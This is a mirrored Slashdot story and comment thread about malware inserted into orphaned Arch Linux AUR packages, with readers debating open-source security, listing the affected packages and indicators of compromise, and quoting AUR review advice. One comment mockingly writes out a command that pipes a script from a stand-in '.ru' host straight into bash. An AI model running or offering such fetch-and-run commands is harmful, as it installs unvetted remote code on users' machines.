Slashdot Mirror


Malware Found in Arch Linux AUR Package Repository (bleepingcomputer.com)

An anonymous reader shares a report: Malware has been discovered in at least three Arch Linux packages available on AUR (Arch User Repository), the official Arch Linux repository of user-submitted packages. The malicious code has been removed thanks to the quick intervention of the AUR team. The incident happened because AUR allows anyone to take over "orphaned" repositories that have been abandoned by their original authors. On Saturday, a user going by the pseudonym of "xeactor" took over one such orphaned package named "acroread" that allows Arch Linux users to view PDF files. According to a Git commit to the package's source code, xeactor added malicious code that would download a file named "~x" from ptpb [dot] pw, a lightweight site mimicking Pastebin that allows users to share small pieces of text.

69 comments

  1. A rare photo of a malware author being born. by AlanObject · · Score: 3, Interesting

    From the looks of it the bad actor xeactor didn't have any expectation beyond finding out if his little trick would work or not.

    On the other side this could be a case study about the immune system that open source provides.

    1. Re:A rare photo of a malware author being born. by Anonymous Coward · · Score: 0

      or the rare photo of someone that has been successfully exploiting this for a long time and got lazy with the latest batch.

    2. Re:A rare photo of a malware author being born. by Anonymous Coward · · Score: 0

      If Xeacter neekaps were broken he would'a found out plenty. OOh the pain ... Ohhh the strain ...

    3. Re:A rare photo of a malware author being born. by Anonymous Coward · · Score: 0

about the immune system that open source provides
      You might be in the minority. We entertain no such illusions.

  2. Moar Fake News! by Anonymous Coward · · Score: 0, Offtopic

    This is IMPOSSIBLE in a Linux environment. There are MANY EYES that guarantee this CANNOT happen.

    Trump 2020

    1. Re: Moar Fake News! by Anonymous Coward · · Score: 0

      Trump Eunuch

    2. Re:Moar Fake News! by Anonymous Coward · · Score: 0

      In other news the DevOps idiots believe that "curl -O - http://legit.ru/install.sh | bash" on a production server is fine.

    3. Re:Moar Fake News! by phantomfive · · Score: 2

      No one ever said that open source was perfect. But consider that we are talking about one piece of malware......then notice how much malware has been found in the Apple store and the Android store.

      --
      "First they came for the slanderers and i said nothing."
    4. Re:Moar Fake News! by Anonymous Coward · · Score: 0

      #QAnon #TheGreatAwakwning

    5. Re: Moar Fake News! by Zero__Kelvin · · Score: 1

      I always love hearing from the idiots who say that bugs / malicious code that gets found shows that Open Source doesn't have the advantage that more bugs will be found. I wonder if y'all are really that stupid.

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
    6. Re:Moar Fake News! by Oswald+McWeany · · Score: 1

      This is IMPOSSIBLE in a Linux environment. There are MANY EYES that guarantee this CANNOT happen.

      Trump 2020

      It's the year of the Linux malware.

      --
      "That's the way to do it" - Punch
    7. Re: Moar Fake News! by Anonymous Coward · · Score: 0

      The AUR is a user repository. It's little different than going onto GitHub and downloading files off random users.

  3. Why so little malware? by Anonymous Coward · · Score: 2, Insightful

    I'm more interested in why there is so little malware. I would have expected lots of malware without any packages needing to be hijacked.

    1. Re:Why so little malware? by jmccue · · Score: 2

      I kind of wonder this also. I do not know how many package maintainers in ARCH or how it works, but with the amount of packages available in some distros these days I guess I should not be surprised.

      Sad that distro maintainers may have to vet maintainers now, adding an additional burden. But as a user we should always be careful with non-core packages.

    2. Re:Why so little malware? by Anonymous Coward · · Score: 1

      I'm more interested in why there is so little malware.

      How many packages (maintainers) are actually already compromised, waiting for the trigger to be pulled to push out the big fail? How would you know?

    3. Re:Why so little malware? by Anonymous Coward · · Score: 1

      It needs another malware program to run. Something called systemd.

    4. Re:Why so little malware? by XArtur0 · · Score: 1

      First: We don't know if there is any more until we find it. Therefore: The System is as Secure as an Open Door.

      Second: Malware authors target platform that matter, i.e. Windows (large user base), RedHat (users are companies), Linux Kernel itself (large user base, governments, companies, etc...)

      And Lastly: There is nothing worthwhile to steal from unemployed neckbeards (although I like Arch, and I work over 14 hrs a day the days I don't attend university).

    5. Re:Why so little malware? by Anonymous Coward · · Score: 0

I kind of wonder this also. I do not know how many package maintainers in ARCH or how it works.

      This was Arch AUR. So not official Arch packages, but user-submitted scripts provided for convenience that you install 100% at your own risk (after you manually inspect the scripts).

    6. Re:Why so little malware? by BrianMarshall · · Score: 1

      I made this comment in the story that is about to roll off the bottom of the page...

      At home, I have used Linux - first Redhat, then Fedora - since about 1999. I have never used any sort of virus/malware scanning software. As far as I know, I have never had any malware. I don't know how common this is.

      --
      "When the going gets weird, the weird turn pro" -- HST
    7. Re:Why so little malware? by nnull · · Score: 1

      Because many arch users actually check the install scripts in AUR and don't just install yaourt. *wink*

    8. Re:Why so little malware? by AHuxley · · Score: 1

It's a lot of work for the number of users per distro. To look at free work on a distro on the users' computer?
      With other consumer OS the ability to "consume" would be of interest to malware.

      --
      Domestic spying is now "Benign Information Gathering"
    9. Re:Why so little malware? by Tyger-ZA · · Score: 0

      I kind of wonder this also. I do not know how many package maintainers in ARCH or how it works, but with the amount of packages available in some distros these days I guess I should not be surprised.

      Sad that distro maintainers may have to vet maintainers now, adding an additional burden. But as a user we should always be careful with non-core packages.

1) Vetting who gets to alter OS packages should be the default, not an "extra burden". Or would you all like an "npm left pad" sort of disaster on your OS? 2) This makes ALL the Arch packages look suspicious, given that there may be others that have been hijacked in this way which we just haven't heard about yet.

    10. Re:Why so little malware? by Opportunist · · Score: 1

      Effort vs. effect. And that ratio simply sucks when you consider the market share of Linux, and then that this market share is also again split up between the various distributions.

      Hence invading a distribution repository isn't that helpful if your goal is what most untargeted malware attacks are aiming for: Wide distribution. It's different if you have a specific target in mind, like a particular government facility, but then you would probably be rather targeting one of the larger distributions, not Arch.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    11. Re:Why so little malware? by Anonymous Coward · · Score: 0

      There is a lot actually but no one bothers to check code anymore, they add on and add on until it gets too big and then they remove stuff that people use the most just so they can say they made it smaller.

    12. Re: Why so little malware? by Zero__Kelvin · · Score: 1

      I see you are confused about how software and Open Source work, even though you are posting on a story of it actually happening. Each individual doesn't have to inspect their own copy. Just one qualified person is all it takes, then everyone benefits from the improved security that results from identifying and correcting the issue. I know ... I know... this technology stuff is *SO* confusing!

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
    13. Re: Why so little malware? by Zero__Kelvin · · Score: 1

      People aren't going to waste their time when they know any malicious code will be discovered quickly and there is a high chance their name will be spread far and wide on the blackball circuit.

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
    14. Re:Why so little malware? by Anonymous Coward · · Score: 0

      This makes ALL the Arch packages look suspicious, given that there may be others that have been hijacked in this way which we just haven't heard about yet.

      What do you mean? AUR is an unofficial user repository - it says absolutely nothing about about the quality of the Arch's official repositories.

    15. Re:Why so little malware? by Anonymous Coward · · Score: 0

      2) This makes ALL the Arch packages look suspicious, given that there may be others that have been hijacked in this way which we just haven't heard about yet.

In this case, it is a repository. If any of the packages were hijacked, the original owner of the repository will be the one to be blamed. This situation arises because AUR allows new guys to take over those repositories that original owners abandon. Most if not all original owners of packages are likely to be reputable contributors. Thus, your conspiracy doesn't work.

    16. Re: Why so little malware? by hairyfeet · · Score: 1

      Except there is a fatal flaw with your argument which TFA shows, which is the whole thing is based on an "is ought" fallacy. You ASSUME there OUGHT to be someone who 1.- Has the years in IT security to spot obfuscated malware code, 2.- Has the time to vet every single package every time it is altered, and 3.- Is able to do that for every single package available before any of those packages are updated but just because you again ASSUME there OUGHT to be someone or multiple someones doing that does NOT mean there IS someone doing that.

Hell if you think about it even for a minute you'll see how foolish the entire argument is, I mean how many packages are in your average distro? Now how many packages are in your average repo? And as we all know shit is changing in the Linux world constantly so how many of those packages are getting changed in any given month? If any of you has looked at the code for the obfuscated C contest you'll know it's not hard to hide malware code in such a way it's DAMN hard to spot...now are you REALLY gonna sit here and argue that someone is paying some huge team of top IT security researchers to sit there 8 hours a day doing NOTHING but vetting your favorite distro? Really? Remember this isn't something you can get some volunteer to do as well written malware code isn't gonna be at all easy to spot and it can even be broken up so that pieces of it are in multiple packages, it takes coders with years of security exp to spot the signs and those guys? Yeah they ain't cheap, not at all.

      --
      ACs don't waste your time replying, your posts are never seen by me.
    17. Re: Why so little malware? by Zero__Kelvin · · Score: 1

I guess the irony escapes you that you are claiming something doesn't work in a story about it actually working. Nobody said Open Source will be free of bugs and malware; the fact is that Open Source leaves open opportunities to get better that closed source doesn't have. This is just one example of the Open Source model working in a way closed source simply can't.

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
    18. Re:Why so little malware? by Anonymous Coward · · Score: 0

      I wondered when you'd show up. You're like the inevitable wasps at a picnic, but with no sting and more grizzling.

    19. Re:Why so little malware? by Anonymous Coward · · Score: 0

      By reading the pkgbuild file, which is just a shell script that defines some variables and functions for makepkg to use when building the package. Go take a look yourself, the PKGBUILD files are all pretty easily viewed through your browser.
      Unless you're talking about the package sources being compromised, which would be a much bigger problem, and disingenuous to pin on AUR itself.

    20. Re:Why so little malware? by Anonymous Coward · · Score: 0

      I always used to, when I used Arch, but I could easily be in the minority there. Yaourt is just a convenience, and still lets you check the scripts you download before building and installing them if you want to.

    21. Re:Why so little malware? by Anonymous Coward · · Score: 0

      Unfortunately Systemd is part of Arch and ultimately why I stopped using the distro.

      For a start the upgrade to Systemd broke my Arch install. Though to be fair I upgraded infrequently which probably isn't the best idea for a rolling release distro, and due to that I could have missed some important instructions.

      But more importantly I feel that Systemd breaks the KISS (Keep It Simple Stupid) philosophy that Arch Linux used to have, which was a large part of why I used Arch. Systemd is just too complex for the average user to really understand, and what I mean is understand what it does behind the scenes, rather than the interface it presents to the user.

      I've now switched to Debian because if I can't have a system that I understand the inner workings of, I might as well use one that is stable.

    22. Re: Why so little malware? by hairyfeet · · Score: 2

      Heartbleed ring ANY bells? That was exploited for God knows how long before anybody got hit with a clue bat (in fact last I checked there are STILL servers out there with the exploit unpatched) but again because everyone ASSUMES the code is being vetted that bug was able to stay in there for decades.

      Then there is the infected Quake 3 Arena that stayed in the Ubuntu repo for over a year, the KDELook trojan that lasted nearly 2 years, hell i could go on all day listing times where nasty shit got completely overlooked because everyone assumed that SOMEBODY was checking this shit...but they weren't and as I pointed out just a teeny tiny bit of logic blows the entire premise to shit.

But let's hear it, Einstein, because I'm sure we'll all find the insane logic hoops you'll be jumping through REALLY funny...explain to us where these magical security IT teams are coming from to vet every single package on the repo of your choice because as I pointed out unless they have years of exp spotting obfuscated C code is DAMN hard, who is paying the many millions to have them do nothing but check all that code, and how they are able to check the hundreds if not thousands of packages that change in any given year on your average distro.

      Because I'm willing to bet my last dollar that if you look at who is accessing the code for the boring bits and bobs that make up your average distro, all the dull parts from the calendar function to the googly eyes to the code that controls the wallpaper, that the only ones accessing that code are the guys doing the changes who you again ASSUME that they are never gonna turn out to be a bad actor...yeah GL with that. Before there really wasn't any point attacking Linux because there just wasn't enough users to make it a juicy target...now there is crypto bugs where you can make an assload using every CPU and GPU you can get your hands on to mine coins....yeah I have a feeling you are seeing the tip of the iceberg and it won't take long before the crypto bugs come in force...again GL with that.

      --
      ACs don't waste your time replying, your posts are never seen by me.
    23. Re: Why so little malware? by Zero__Kelvin · · Score: 1

Heartbleed is a perfect example of a problem that was only found because it was Open Source. You want to cry "look how long it took (to work)" as some argument that it didn't happen .... and again, that is stupid. The point is it was found and fixed, and that only happened because it was open source. I didn't waste my time reading the rest of the drivel you wrote. Either you are a troll or you lack the faculties to understand this simple concept.

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
    24. Re: Why so little malware? by Anonymous Coward · · Score: 0

      This issue was with bash scripts, not C code. You don't seem to have a grasp of the context of this current event. This "obfuscated C code contest" angle of argument is getting you nowhere. Nobody is denying how easy it is to hide malicious code in such a big, ugly low-level language as C, but if you had any idea how little time it takes to manually inspect a PKGBUILD, you'd realize why this kind of problem happens so rarely in a community-maintained package repository consisting of 47,738 packages and counting.

      Open source is not immune to malicious code, but it is more resistant. It also helps that reporting malicious code is seen as good citizenship in our community, whereas reporting exploits in proprietary software comes with the risk of having a knock at your door by the police just for doing the right thing. Forget the "many eyes" argument of open source (because honestly, everyone tries to exploit all software, closed or open) -- the real thing that keeps us in the open source community safer than those who use proprietary software is that we welcome bug reports, security notices and fixes, whereas it's a mixed bag when working with proprietary software developers. If I report this flaw, will the company who makes the software be vigilant and make a patch? Will they even listen to me at all? Will they thank me? Will they reward me? Will they charge me with some bullshit under the CFAA and send me to prison, just to save face? Who knows?

    25. Re:Why so little malware? by Anonymous Coward · · Score: 0

      Oh, fuck yaourt. If you can't do "git pull; less PKGBUILD" followed by "makepkg -csi" you shouldn't be using Arch Linux.

  4. Why not put malicious code in post-install script? by wuyongzheng · · Score: 1

First, post-install script runs as root. Second, it runs during installation. If putting it in the program (e.g. acroread), the user has to run it to trigger. Most Linux package systems support post-install script. e.g. https://docs-old.fedoraproject...

  5. Caught within 1-3 hours. Phone apps stay for month by raymorris · · Score: 4, Insightful

He was caught within a few hours, because all changes are public:

    https://aur.archlinux.org/cgit...

    Possibly bad guys would rather add trojans to iPhone and Android apps, which may stay in the store for months without detection. You can't tell what changes have been made to compiled apps you download on iPhone, Android, or Windows.

  6. Re:Why not put malicious code in post-install scri by Anonymous Coward · · Score: 1

I recommend either installing AUR packages by hand, during which you can check the Post-Install, or using an AUR helper that allows viewing of said script. True, it takes time to verify yourself. But, a cursory glance helps screen some of the stupid stuff like pulling a script from a pastebin clone.

    And yes, it takes time. That's always a tradeoff, convenience vs security.

  7. Doesn't surprise me by Anonymous Coward · · Score: 0

    I used Arch for about 7 years until last year. I *always* inspected every AUR package by hand to make sure it wasn't doing anything suspicious. And 95% of the time I would hack around to make it install without any root privileges whatsoever, unlike the default.

    The amount of AUR install scripts I had to edit or modify was quite high too. For example you would install an AUR package but the program would be out of date, so you have to update the package location and the verification hash. Or it would pull a file from some unofficial place and instead I would update it to be from the official github repositories, etc.

    You can tell a lot of less popular AUR packages are put together by non linux power users, to say the least.

    If you wanted to inject a bunch of malware with new AUR files it would be pretty easy, I bet there is a lot more uncaught ones. Because the script pulling files from random servers and passing the hash check (that the malware creator provides) gives a huge false sense of security.

  8. The answer is simple: Eternal September. by Anonymous Coward · · Score: 0

Arch scares the iSimple crowd that prays their daily KISS (keep it simple stupid) mantra. Fans of AOL^WApple haven't invaded it yet nor demanded it becomes a "Desktop" to suit their lights-out-upper-storey needs, like with Noobuntu.

  9. This is such a load of BS by Anonymous Coward · · Score: 0

    I use Arch. Packages from the AUR are supposed to be manually reviewed by the user, so a user playing by the rules should not be affected by things like this. Plus, this "malware" was so badly coded that it didn't even do anything.

    1. Re:This is such a load of BS by nnull · · Score: 1

      More than likely a proof of concept to show some forum mods how stupid they look. It was only a matter of time someone tried to pull this off on AUR. I don't know why they don't expand on AUR to have more trusted maintainers, as there are quite a bit of programs there that have known maintainers of projects. It gets used quite often on Arch due to missing packages.

  10. Affected Packages by Philotomy · · Score: 4, Informative

    According to posts on aur-general, the known affected packages are:

    • acroread 9.5.5-8
    • balz 1.20-3
    • minergate 8.1-2

    According to comments on the AUR acroread package, the script the compromised package installed (to upload system details) contained an error and wouldn't function properly. The script also installed a systemd timer, and the comments advise checking your system for:

    • /usr/lib/xeactor
    • /usr/lib/systemd/system/xeactor.timer
    • /usr/lib/systemd/system/xeactor.service

As a side-comment, for those unfamiliar with Arch, these compromised packages are not part of the official Arch repositories. The AUR is a "user repository": a collection of user-supplied packages which require deliberate download and installation. AUR packages should always be reviewed before installing them, and not installed if you don't trust the package. As the AUR documentation explains, "Warning: Carefully check all files. Carefully check the PKGBUILD and any .install file for malicious commands. PKGBUILDs are bash scripts containing functions to be executed by makepkg: these functions can contain any valid commands or Bash syntax, so it is totally possible for a PKGBUILD to contain dangerous commands through malice or ignorance on the part of the author. Since makepkg uses fakeroot (and should never be run as root), there is some level of protection but you should never count on it. If in doubt, do not build the package and seek advice on the forums or mailing list."

    1. Re: Affected Packages by Anonymous Coward · · Score: 1

      The official security bulletin also advises end users to look for a highly suspect and malicious malware code called 'systemd'. If found, removal is strongly recommended and encouraged for both the sanity and security of the end user and system.

    2. Re:Affected Packages by AmiMoJo · · Score: 1

      Ah, the classic wetware exploit: user too lazy to carefully examine every file before installing.

      --
      const int one = 65536; (Silvermoon, Texture.cs)
      SJW, n: "Someone I don't like, and by the way I'm a fuckwit" - AC
    3. Re:Affected Packages by Anonymous Coward · · Score: 0

      Here's the commit for acroread

      https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id=b3fec9f2f167

    4. Re:Affected Packages by Anonymous Coward · · Score: 0

      By the way, 'acroread' is Adobe Acrobat Reader.

The summary failed to mention this.

      It is a pretty major piece of software, I guess, but I doubt many people use it in *nix-land.

    5. Re:Affected Packages by Anonymous Coward · · Score: 0

      To be fair, I'm not sure that many people use it in Windows land either these days.

  11. These are the infected packages by aglider · · Score: 1
    --
    Sent as ripples into the electromagnetic field. No single photon has been harmed in the process.
  12. "discovered in at least three Arch" by Anonymous Coward · · Score: 0

    "At least" - why the sensationalism? You could equally write "just" or, preferably nothing.

  13. It's a matter of trust by aglider · · Score: 0

If you read the mailing list thread you understand where the real problem is.

    "Users should check what they install". What's been your latest package check?
    Have you checksummed your ISO download?

    And why shouldn't I check the downloads from the main website? Because of trust?
    There can always be a crack I can use to slip into, if I have enough motivation.

    I think the whole system is screwed up. I think "we can't rewind, we've gone too far".

    --
    Sent as ripples into the electromagnetic field. No single photon has been harmed in the process.
    1. Re:It's a matter of trust by aquabat · · Score: 3, Funny

      I think the whole system is screwed up.

      It could be just your keyboard driver. If you think you've been infected, maybe check that one.

      --
      A republic cannot succeed till it contains a certain body of men imbued with the principles of justice and honour.
    2. Re: It's a matter of trust by Zero__Kelvin · · Score: 1

      You shouldn't do it for the official / non user repos because that check gets performed automatically by the package management tool so it would be redundant.

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
    3. Re: It's a matter of trust by aglider · · Score: 1

      So you are saying there's no way to slip into the official package system or the official software repository.
      Cool.
      We'd need to have that everywhere, then!

      --
      Sent as ripples into the electromagnetic field. No single photon has been harmed in the process.
    4. Re: It's a matter of trust by Zero__Kelvin · · Score: 1

Don't be snarky about something you don't even understand. What I said is that there is a way but it involves being able to change the file(s) on the server that hold the checksums as well as the actual package(s). It is an extremely secure method, which is why you almost never see a story about an official repo being compromised.

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
  14. AUR is not secure by design, but that's fine by damaki · · Score: 2

    It is written basically everywhere in the AUR official documentation: do not trust AUR packages, verify everything before install! AUR packages are like Ubuntu PPAs, there is no security policy and no patch policy. But that is totally fine! It is entirely the point of AUR; anybody can contribute to it. For AUR packages security, you are on your own and you should check the sources thoroughly when you install an AUR package!

    --
    Stupidity is the root of all evil.
    1. Re:AUR is not secure by design, but that's fine by sad_ · · Score: 1

      the people who actually care are a minority, most people will just install whatever.
      it's like that on windows (people just download and install anything they find on whatever shady site) or smartphones (most android problems result from installing apk's downloaded from... shady sites).
      things like AUR, PPA's, containers (docker, snap, ...) etc bring this problem to linux. it's a security disaster waiting to happen.

      --
      On a long enough timeline, the survival rate for everyone drops to zero.
    2. Re:AUR is not secure by design, but that's fine by Anonymous Coward · · Score: 0

Usually you will check the PKGBUILD because at least 1 out of 3 AUR packages will fail to compile.
      If you get no makefile error, you will get a lib runtime error. Or it will be missing a dependency. Or something else.

      Anyway a systemd file is not very stealthy, especially if active. I usually have at most ~10 active systemd service (most disabled / stopped). Arch is not windows.

    3. Re: AUR is not secure by design, but that's fine by Zero__Kelvin · · Score: 1

That is a ridiculous thing to say. Use of non-official packages / software is *always* a risk, and everything you are claiming is some kind of Achilles heel is actually the tools that help mitigate that risk. They work quite well and have been working well for over a decade.

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
    4. Re:AUR is not secure by design, but that's fine by drinkypoo · · Score: 1

      AUR packages are like Ubuntu PPAs, there is no security policy and no patch policy. But that is totally fine! It is entirely the point of AUR; anybody can contribute to it.

      No, AUR packages are not like Ubuntu PPAs, because every deb is signed, and every PPA belongs to a specific user. You cannot get malware from another user account which has taken over a PPA simply by updating, because Ubuntu does not allow different user accounts to take over a PPA. Naturally, someone who manages to take over someone else's identity to the point that they can sign packages as that user can upload malware to their PPA, but that's true of all such schemes.

      Letting users take over other users' repos is a misfeature, period. Users should have to change repos to get packages from a different user.

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
  15. Most people aren't criminals. by Anonymous Coward · · Score: 0

    And anyone smart enough to build malware is usually smart enough to know it's bad, wrong and probably a criminal offense of some kind anywhere on the planet.

  16. Malware found in pastebin service by Anonymous Coward · · Score: 0

What a piece of garbage article, it's like a pastebin with changeable ownership. Would you also post a news article for every pastebin that contains bullshit? No, right? There isn't much of a difference compared to the AUR where random people upload random content. If you use it without carefully reviewing you are the one to blame.

  17. Next: FreeBSD by Anonymous Coward · · Score: 0

    Next in line for malware pwnage, if it isn't already, is FreeBSD. There, you can create a bugzilla account with no-one checking who you are, and submit a patch to any port. If the port is badly maintained, and the maintainer does not see or react to it (which most of those ports are), any committer will take the patch and commit it, if it builds, USUALLY WITHOUT checking for what it does. If it builds, it passes, is committed.

    The only thing surprising here is the fact all this wasn't discovered earlier. An Ubuntu snap, Gentoo GitHub repo, Arch AUR, all in few weeks. 2018 will be the year of Pwnage (and it started so well with Meltdown and Spectre).

18. packages affected by Anonymous Coward · · Score: 0

    packages compromised according to mailing list
    * acroread 9.5.5-8
    * balz 1.20-3
    * minergate 8.1-2

    According to #archlinux "jelle" "we decided not to talk about it"